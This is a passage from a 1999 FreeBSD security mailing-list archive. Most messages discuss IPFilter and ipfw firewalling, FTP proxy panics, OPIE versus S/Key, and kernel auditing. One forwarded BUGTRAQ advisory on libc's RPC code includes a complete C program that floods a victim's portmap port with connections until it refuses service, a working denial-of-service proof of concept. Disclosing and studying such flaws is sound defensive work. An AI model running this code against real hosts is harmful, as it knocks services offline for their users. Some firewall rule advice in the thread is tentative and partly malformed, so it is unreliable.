a pretty good chance that BSD-licensed code will be used as-is. If it ain't broke, they won't fix it. --Brett "For every action there is an equal and opposite government program." --Bob Wells To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 19:49: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from madeline.boneyard.lawrence.ks.us (madeline.boneyard.lawrence.ks.us [24.124.33.226]) by hub.freebsd.org (Postfix) with ESMTP id 42DF714F44 for ; Wed, 14 Apr 1999 19:49:05 -0700 (PDT) (envelope-from bsd-sec@sunflower.com) Received: from madeline.boneyard.lawrence.ks.us (bsd-sec@madeline.boneyard.lawrence.ks.us [24.124.33.226]) by madeline.boneyard.lawrence.ks.us (8.9.3/8.9.3) with ESMTP id VAA23995; Wed, 14 Apr 1999 21:48:13 -0500 (CDT) Date: Wed, 14 Apr 1999 21:48:09 -0500 (CDT) From: "Stephen D. Spencer" X-Sender: bsd-sec@madeline.boneyard.lawrence.ks.us To: Brendan Conoboy Cc: John Baldwin , freebsd-security@FreeBSD.ORG Subject: Re: IPFilter? In-Reply-To: <199904150011.SAA02517@kitsune.swcp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Apr 1999, Brendan Conoboy wrote: > [...] > Speaking of which, is anybody using ipfilter's ftp proxy successfully? I > have successful kernel panics, but the delight in this is fleeting. > And so it goes with the version integrated with FreeBSD (3.2.7 I believe) I am current running 3.2.11b4 with the ftp proxy successfully in use. (see http://cheops.anu.edu.au/~avalon/ip-filter.html) Don't worry about the future. Stephen Spencer Or worry, but understand that worrying Lawrence, KS is about as effective as trying to solve an algebra equation by chewing bubble gum. -lee perry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 22:56:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from iisi.co.jp (ns.iisi.co.jp [203.180.102.129]) by hub.freebsd.org (Postfix) with ESMTP id 184FB152EF for ; Wed, 14 Apr 1999 22:56:34 -0700 (PDT) (envelope-from wen@iisi.co.jp) Received: from wen (wen.iisi.co.jp [203.180.102.179]) by iisi.co.jp (8.7.3+2.6Wbeta5-NAO.1/3.4W2:19960712 183202) with SMTP id OAA03216 for ; Thu, 15 Apr 1999 14:52:50 +0900 (JST) Message-ID: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp> From: "GuangChun Wen" To: Subject: Traffic Control in FreeBSD Date: Thu, 15 Apr 1999 14:57:25 +0900 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-2022-jp" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi eveyone: I wonder if it is possible to using FreeBSD as security gateway, and implement Traffic control mechanism on it by software? I have read rfc1633 and it seems that Traffic control usually is done in router by the help of hardware.I also heard that Linux-based router product was on the market.what about FreeBSD? if general cisco routers have traffic control function? can anybody give me some advice? Best Regards, ========================================== GuangChun Wen Software Engineer IISI Co.,Ltd. Japan Phone: 81-3-5287-9500 Fax: 81-3-5287-9515 ========================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 23:57:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 5492714C83 for ; Wed, 14 Apr 1999 23:57:33 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by maile.telia.com (8.8.5/8.8.8) with ESMTP id IAA24337; Thu, 15 Apr 1999 08:55:11 +0200 (CEST) Received: from tu (t2o68p8.telia.com [62.20.138.128]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id IAA14250; Thu, 15 Apr 1999 08:55:04 +0200 (CEST) Received: by localhost with Microsoft MAPI; Thu, 15 Apr 1999 08:51:26 +0200 Message-ID: <01BE871D.25BDF540.thomas.uhrfelt@plymovent.se> From: Thomas Uhrfelt Reply-To: "thomas.uhrfelt@plymovent.se" To: "'Brendan Conoboy'" Cc: "'freebsd-security@freebsd.org'" Subject: SV: IPFilter? Date: Thu, 15 Apr 1999 07:51:21 +0200 Organization: Plymovent AB X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Go ahead and do the groundwork, I am sure the documenters would love to see that addition, otherwise I'll put it up as a webpage. Regards, Thomas > Hi John, > > IP Filter comes with its own NAT, entirely separate from natd. I prefer > IP filter to IPFW and imagine others might as well. The original poster > is right though, the documentation is severely lacking. I could write > something up if there's support (IE, somebody says "hey, do the groundwork > for this, I'll edit it, then throw it into the handbook"), but it wouldn't > be a complete documentary on ipfilter's features. Perhaps this is still > better than what is available now. > > Speaking of which, is anybody using ipfilter's ftp proxy successfully? I > have successful kernel panics, but the delight in this is fleeting. > > -Brendan (synk@swcp.com) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 1:10:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from kamna.i.cz (kamna.i.cz [193.85.255.30]) by hub.freebsd.org (Postfix) with SMTP id 15BF21531A for ; Thu, 15 Apr 1999 01:10:43 -0700 (PDT) (envelope-from mm@i.cz) Received: (qmail 26341 invoked from network); 15 Apr 1999 08:12:05 -0000 Received: from woody.i.cz (@193.85.255.60) by kamna.i.cz with SMTP; 15 Apr 1999 08:12:05 -0000 Content-Length: 1236 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Thu, 15 Apr 1999 10:08:15 +0200 (MET DST) Reply-To: mm@i.cz From: Martin Machacek To: freebsd-security@FreeBSD.ORG Subject: Re: IPFilter? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 15-Apr-99 Stephen D. Spencer wrote: > On Wed, 14 Apr 1999, Brendan Conoboy wrote: > >> [...] >> Speaking of which, is anybody using ipfilter's ftp proxy successfully? I >> have successful kernel panics, but the delight in this is fleeting. >> > > And so it goes with the version integrated with FreeBSD (3.2.7 I believe) > > I am current running 3.2.11b4 with the ftp proxy successfully in use. > (see http://cheops.anu.edu.au/~avalon/ip-filter.html) I've had also troubles using transparent proxing with IPFilter 3.2.10 and FWTK v 2 (with appropriate patches) on FreeBSD 2.2.8. In every case the ioctl on /dev/ipl trying to read the original target address failed. I've tried multiple configurations of ipnat rules with no success. I pretty much sure that I've tried everything reasonable. The built in FTP proxy didn't work either except for passive mode transfers (that was actually the reason why I was experimenting with ftp-gw from FWTK). I would very much like to use IPFilter instead of ipfw because of it's (IMO) better filtering capabilities and kernel implementation of NAT but the problem with FTP is a clear show stopper. Don't you know whether it works with 3.2.11b4? Martin --- [PGP KeyID F3F409C4] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 1:30:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id DD90B14C30 for ; Thu, 15 Apr 1999 01:30:37 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA09465; Thu, 15 Apr 1999 09:27:58 +0100 (BST) Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: "Dmitry Valdov" , "Jordan K. Hubbard" Cc: Subject: Re: FreeBSD 3.1 Reboots Date: Mon, 19 Apr 1999 09:28:03 +0100 Message-ID: <01be8a3e$8ab0ca80$380051c2@greg.qmpgmc.ac.uk> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thankyou ... # Given that machine does the following: It has 6 10/100 PCI (xl0) Network Interfaces using a SuperMicro 9 PCI, 4 ISA, PII Does all DNS, Sendmail, Proxied Internet, NAT, IPFW, etc Firewalls the WWW on one of its interfaces Does NAT for two other network interfaces. Is the DNS for nearly 2000 IP Addresses Sends & recieves around 1400 e-mails per day. Does IP filtering to another remote network. Does routing between yet two more interfaces. Has two 56K PPP CHAP dialups. and if that isn't enough does file/print sharing using Samba.... I think I'll look at 3.1-Stable as a starting point for VM! I do not think it's the hardware... I did comprehensive tests before I installed the unit above!! Thanks again Greg ps. I'd say that is a moderate load The -----Original Message----- From: Dmitry Valdov To: Jordan K. Hubbard Cc: Theodore Rush ; freebsd-security@FreeBSD.ORG Date: 14 April 1999 21:16 Subject: Re: FreeBSD 3.1 Reboots > > >On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > >> Date: Wed, 14 Apr 1999 11:01:39 -0700 >> From: "Jordan K. Hubbard" >> To: Theodore Rush >> Cc: freebsd-security@FreeBSD.ORG >> Subject: Re: FreeBSD 3.1 Reboots >> >> > Now as of 50 minutes ago ...suddenly the machine REBOOTS. >> >> Without any details, it's impossible to say. >> > >It Possible. >There is a problem in 3.1RELEASE. It reboots 1-2 times a day (in heavy >load) because of VM error. >The solution is to upgrade to 3.1Stable. > >Dmitry. > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 2:23: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id B2DC81534F for ; Thu, 15 Apr 1999 02:22:58 -0700 (PDT) (envelope-from mark@greenpeace.grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.2/8.9.2) with ESMTP id LAA12738; Thu, 15 Apr 1999 11:20:27 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za) Received: from greenpeace.grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id LAA38947; Thu, 15 Apr 1999 11:20:26 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za) Message-Id: <199904150920.LAA38947@greenpeace.grondar.za> To: Evil Dave Cc: freebsd-security@freebsd.org Subject: Re: OPIE In-Reply-To: Your message of " Wed, 14 Apr 1999 17:37:52 MST." <199904150037.RAA18416@kizmiaz.dis.org> References: <199904150037.RAA18416@kizmiaz.dis.org> Date: Thu, 15 Apr 1999 11:20:22 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Evil Dave wrote: > the version of OPIE in /usr/src/contrib/opie is version 2.31. version 2.32 > was released well over a year ago. I'm told that to upgrade this (well, > to put the newer minor revision in place) i need some help from someone > with contrib access. any takers? I'm happy to help! > i have a pam opie lib built from the 2.31 tree and it works, but i'd like > to see the newer (again, over a year old) version put in place in case > someone ever decides to make a pam module out of the newer release. i'm sure > using 2.31 isnt all that bad, and it works well for me. SKey makes me nervous. I'd be happy to improve this (and add SHA as well). > i find it odd that s/key is supported so widely while OPIE seems ignored. > Bellcore gave up s/key and the naval research labs took it over. They had > to rename it so they decided on OPIE (one-time passwords in everything) and > implemented md5, which, if i'm not mistaken, was not in s/key at the time. i'm > not sure about s/key, did they ever implement md5? Not AFAIK. > OPIE is clearly newer and better. but i'm sure i'm reciting ancient and boring > history to most of you. the 2.31 version was released 3/20/1997. the 2.32 > version was released 1/1/1998. SKey defaults to MD4, which has key collision problems that allow an attacker with moderate computing power, some time and a few sample (snooped) keys a reasonable chance at getting a workable key. MD5 and SHA are much harder to attack in this way. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 4:10: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from bitey.cyber.com.au (james1.lnk.telstra.net [139.130.48.78]) by hub.freebsd.org (Postfix) with ESMTP id 8A37A14FDC for ; Thu, 15 Apr 1999 04:09:57 -0700 (PDT) (envelope-from tetragon@cyber.com.au) Received: from cyber.com.au (yakko [203.7.155.163]) by bitey.cyber.com.au (8.9.2/8.9.1) with ESMTP id TAA01359 for ; Thu, 15 Apr 1999 19:53:38 +1000 (EST) (envelope-from tetragon@cyber.com.au) Message-ID: <36ECCA8D.7EA8FFD3@cyber.com.au> Date: Mon, 15 Mar 1999 19:53:33 +1100 From: Gavan McCormack Organization: Searching --- 0% done. Please stand by. X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: IPFilter? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John Baldwin wrote: > On 14-Apr-99 Thomas Uhrfelt wrote: > > I already bought the 'Building Internet Firewalls' and its a good book, and > > I got the theoretic side of building a firewall pretty much nailed down. > > What I am missing is FreeBSD specific things + IPFilter/NAT things. I am > The section "Running NATD" gives step by step instructions on getting NAT up > and running. For manpages in general, you can go to > http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE THis is not the NAT in ipfilter. (AFAIK.) > I believe that you can use ipfw ('man ipfw' at the URL above) to do the same > stuff as IPFilter. ipfw is definetly a different beastie to ipfilter, and is IMHO, not as comprehensive as ipfilter. IPfilter is at this time severely lacking in documentation. I've met with Darren, he is not one for documentation. :) The best thing is to check the source, if in doubt. I guess the FreeBSD dudes will rectify this by the time IPfilter becomes the default firewall for FreeBSD. I found it pretty frustrating to setup, so here is my thoughts. When I started out on IPfilter, I made a crude rule template. type dir [log] [quick] [on $if] [proto $prot] from $host/net to $host/net \ [port = $port/range] [keep state] [flags $flags] When specifying port numbers, use ' = nn', and to specify ranges use ' 1000 <> 2000' inclusive and ' 1000 >< 2000' exclusive. You can use hostnames from /etc/hosts or wherever, and also IP numbers/subnets in the form of n.n.n.n/m where the m is the netmask in decimal bits. (Ie: a netmask of 255.255.255.248 (3-bit subnet) would be 32-3, or /29.) There are a few obvious things to know too. The best way to *check* the rules, is to allow everything, and block what you are writing the rule for. Then, once you've got everything looking like it should, reverse that. Change the rules to pass, and then block everything else. Obvious things you might miss. Dont firewall localhost. If you are blocking any to any at the end, make a rule for localhost. You must also have a rule to allow in established-connection packets. THat is, if you are allowing connections out, you'll need a rule that allows the remote host to reply. Ie: pass in quick proto tcp from any to any flags A/A (As far as I know, IPfilter maintains a table of outward going connections, and only allows in established-connection return packets for connections in the table. This stops anyone getting through by forging packets as return packets. (ACK or RST bits set on.) Can anyone confirm this is what IPfilter does? Or IPFW?) If you want to pass through 53, you will need a rule that will 'keep-state' on outgoing. Ie: pass out quick on ppp0 proto udp from any to any port = 53 keep state You'll ofcourse need an equivalent in rule. pass in quick proto tcp from any to port = 53 Not _exactly_ sure what keep-state does, but it is required for 53 because it stops packets from being adversely changed. (nameserver stuff needs 53 on both ends of the connection too.) When using the NAT part of IPfilter, the IPfilter rules are applied before NAT for incoming packets, and the opposite of outgoing packets. This makes sense, its silly to translate packets just for IPfilter to drop them. The IPfilter in 3.1-RELEASE has a bug (I think) in the logging, to do with NAT. When working out what is happening in the rules when using NAT, it will log dropped packets without taking NAT into account. (Even though it should, seeing as NAT is being applied to the packets.) I can provide more info for those who are curious. Just dont take the logs _too_ literally when dealing with NAT in the equasion. Passing ICMP and UDP is a good thing initially, atleast untill you get all your TCP rules sorted out. And dont make rules needlessly, especially for ethernet interfaces. If you dont trust your ethernets, (and you have a default route to a ppp0 or a seperate interface to the net) apply the same rules for your internet interface to all interfaces by leaving out the 'on ' part of the rule. You want as few rules as possible ofcourse, and if the machine routes for havily-used ethernets, the machine should be kinda beefy.. I havent used the in-kernel ftp proxy yet, so cant comment about problems with that. Apologies if I got any details wrong, I'm kinda starting out at this myself. Lemme know if I got any of that wrong. > > Thomas Uhrfelt > John Baldwin -- http://members.freedomnet.com/~jbaldwin/ -- Gavan McCormack - tetragon@cyber.com.au - tetragon@bitey.net Cybersource P/L. TCPIP network management & Unix system administration. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:30:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from fep04-svc.tin.it (mta04-acc.tin.it [212.216.176.35]) by hub.freebsd.org (Postfix) with ESMTP id 0B6F414E2D for ; Thu, 15 Apr 1999 12:30:49 -0700 (PDT) (envelope-from molter@tin.it) Received: from nympha.ecomotor.it ([212.216.29.181]) by fep04-svc.tin.it (InterMail v4.0 201-221-105) with SMTP id <19990415192826.EXBN9313.fep04-svc@nympha.ecomotor.it> for ; Thu, 15 Apr 1999 21:28:26 +0200 Received: (qmail 2062 invoked by uid 1000); 15 Apr 1999 18:40:33 -0000 From: "Marco Molteni" Date: Thu, 15 Apr 1999 20:40:33 +0200 (CEST) X-Sender: molter@localhost To: Joe Orthoefer Cc: freebsd-security@freebsd.org Subject: Re: KAME ipsec and cisco IOS In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Apr 1999, Joe Orthoefer wrote: > Is it currently possible to get a cisco with ipsec and a freebsd box > running the KAME stuff to pass encrypted traffic back and forth > (ipv4+ipsec)? I realize the problem is principly the key management > between the two. Has anyone even attempted this? Is there a better place > to ask this question? Joe, try the mailing list snap-users@kame.net Marco --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:41:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.program-products.co.uk (unknown [212.240.242.226]) by hub.freebsd.org (Postfix) with ESMTP id B865A14DE0 for ; Thu, 15 Apr 1999 12:41:25 -0700 (PDT) (envelope-from terry@program-products.co.uk) Received: by mailgate.program-products.co.uk via smap (V2.1) id xma014024; Thu, 15 Apr 99 20:38:31 +0100 Distribution: local To: mm@i.cz, freebsd-security@freebsd.org Subject: Re: IPFilter? References: From: Terry Glanfield Date: 15 Apr 1999 20:38:28 +0100 In-Reply-To: mm@i.cz's message of "15 Apr 99 08:08:15 GMT" Message-Id: Lines: 51 X-Mailer: Gnus v5.6.44/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Martin, mm@i.cz (Martin Machacek) writes: > I've had also troubles using transparent proxing with IPFilter 3.2.10 and FWTK > v 2 (with appropriate patches) on FreeBSD 2.2.8. In every case the ioctl on > /dev/ipl trying to read the original target address failed. Check your fwtk/lib/hnam.c. It may be out of date - mine was. The relevant code snippet is appended below. > The built in FTP proxy didn't work either except > for passive mode transfers (that was actually the reason why I was experimenting > with ftp-gw from FWTK). Why would you want anything *but* passive transfers? Regards, Terry. #if defined(__FreeBSD__) /* The basis for this block of code is Darren Reed's patches to the TIS ftwk's ftp-gw. */ bzero((char*)&sin,sizeof(sin)); bzero((char*)&rsin,sizeof(rsin)); if(getsockname(fd,(struct sockaddr*)&sin,&sl)<0) { return NULL; } sl=sizeof(rsin); if(getpeername(fd,(struct sockaddr*)&rsin,&sl)<0) { return NULL; } natlookup.nl_inport=sin.sin_port; natlookup.nl_outport=rsin.sin_port; natlookup.nl_inip=sin.sin_addr; natlookup.nl_outip=rsin.sin_addr; natlookup.nl_flags = IPN_TCP; if((natfd=open("/dev/ipnat",O_RDONLY))<0) { return(NULL); } if(ioctl(natfd,SIOCGNATL,&natlookup)==(-1)) { return(NULL); } close(natfd); if(ptr) *ptr=ntohs(natlookup.nl_realport); sprintf(buf,"%s",inet_ntoa(natlookup.nl_realip)); return (buf); #endif To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:58: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id B812D14C35 for ; Thu, 15 Apr 1999 12:57:48 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id PAA06227 for freebsd-security@freebsd.org; Thu, 15 Apr 1999 15:55:26 -0400 (EDT) Date: Thu, 15 Apr 1999 15:55:24 -0400 (EDT) From: Daniel Hagan To: freebsd-security@freebsd.org Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ---------- Forwarded message ---------- Date: Wed, 14 Apr 1999 15:26:14 +0200 From: Lukasz Luzar To: BUGTRAQ@NETSPACE.ORG Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet, Poland http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Raport title : Lack of RPC's implementation in libc libraries and how it affects for example portmap. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Problem found at : 08 April 1999 Raport published : 14 April 1999 Raport code : KKIS.08041999.001.b Short description : full description below Vulnerable versions : libc*, up to current. Platforms affected : Linux X.X, FreeBSD X.X, probably others... Patches : curently not available Archive : http://www.security.kki.pl/advisories/ Impact description : full description below Risk level : medium Notes : we were unable to contact with authors of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It seems that libc's RPC implementation does not check neither time of established connections, nor number of connected sockets. It is quite dangerous, because many network services is based on this functions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Below there is ther program which shows how to make DoS of portmap (tcp) When max. limit of descriptors per process is not set, it could easly lead to haevy problems with victim's machine stability. (e.g. default sets on FreeBSD) When limit of open descriptors is reached, portmap begins to refuse all new connections. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- CUT HERE --- /* * example.c by Lukasz Luzar (lluzar@security.kki.pl) */ #include #include #include #include #include #include #define ADDR "10.0.0.1" // victim's IP address in dot notation #define PORT 111 // victim service to DoS eg. portmapper void main() { int sockfd, n = 0; struct sockaddr_in victim_addr; bzero((char *) &victim_addr, sizeof( victim_addr)); victim_addr.sin_family = AF_INET; victim_addr.sin_addr.s_addr=inet_addr( ADDR); victim_addr.sin_port = htons( PORT); fprintf( stdout, "Opening new connections...\n"); for(;;) { if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) { fprintf( stderr, "socket error at %d\n",n); break; } if( connect( sockfd,(struct sockaddr*) &victim_addr, sizeof( victim_addr)) < 0) { fprintf( stderr,"connect error at %d\n",n); break; } n++; } fprintf( stdout, "Established %d connections " "and waiting...\n", n); for(;;); } --- CUT HERE --- ~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 13: 9:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6720C150CF for ; Thu, 15 Apr 1999 13:09:44 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id WAA05460; Thu, 15 Apr 1999 22:07:22 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id VAA01781; Thu, 15 Apr 1999 21:11:31 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-reply-to: Your message of "Mon, 12 Apr 1999 09:39:31 EDT." Date: Thu, 15 Apr 1999 21:11:31 +0200 Message-ID: <1779.924203491@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I had suspected (and observed) as much. What is the rational behind >having the name lookup pull the pathname into the kernel as opposed to >using a copyin in the syscall and passing it in as an argument? >Presumably someone, somewhere has to allocate space on the stack, and if >it's done in the syscall function then more argument processing is done in >one place? This would make at least a bit more available to an auditing >layer in the syscall. I think it is an old thing, conserving kernel memory. Indeed it may not make sense today where the vfs-name-cache is so much more efficient. Changing it may be a PITA. >I'm not sure if you've had a chance to look at the POSIX.1e draft or my >man pages for it. The man pages are online on by POSIX.1e page as part of >the tarball containing the first pass. The API is completely documented, >but I still have to document the audit event types and what they expect to >be reported. Sorry, no, time is a scarce resource for me these days... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 23:50:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 814C615162 for ; Thu, 15 Apr 1999 23:50:50 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id QAA06234; Fri, 16 Apr 1999 16:48:26 +1000 Date: Fri, 16 Apr 1999 16:48:26 +1000 From: Bruce Evans Message-Id: <199904160648.QAA06234@godzilla.zeta.org.au> To: phk@critter.freebsd.dk, robert+freebsd@cyrus.watson.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>I had suspected (and observed) as much. What is the rational behind >>having the name lookup pull the pathname into the kernel as opposed to >>using a copyin in the syscall and passing it in as an argument? >>Presumably someone, somewhere has to allocate space on the stack, and if Space is allocated by zalloc(). Not long ago, space was allocated by malloc(). The kernel stack may be too small to hold a name of length MAXPATHLEN. >>it's done in the syscall function then more argument processing is done in >>one place? This would make at least a bit more available to an auditing >>layer in the syscall. > >I think it is an old thing, conserving kernel memory. Indeed it may >not make sense today where the vfs-name-cache is so much more efficient. >Changing it may be a PITA. I think it's just centralisation. The pathname is copied in in one place instead of in 100's of syscall functions. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 8:47:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 61E5A1542F for ; Fri, 16 Apr 1999 08:47:10 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA17432; Fri, 16 Apr 1999 11:41:00 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 16 Apr 1999 11:41:00 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Bruce Evans Cc: phk@critter.freebsd.dk, 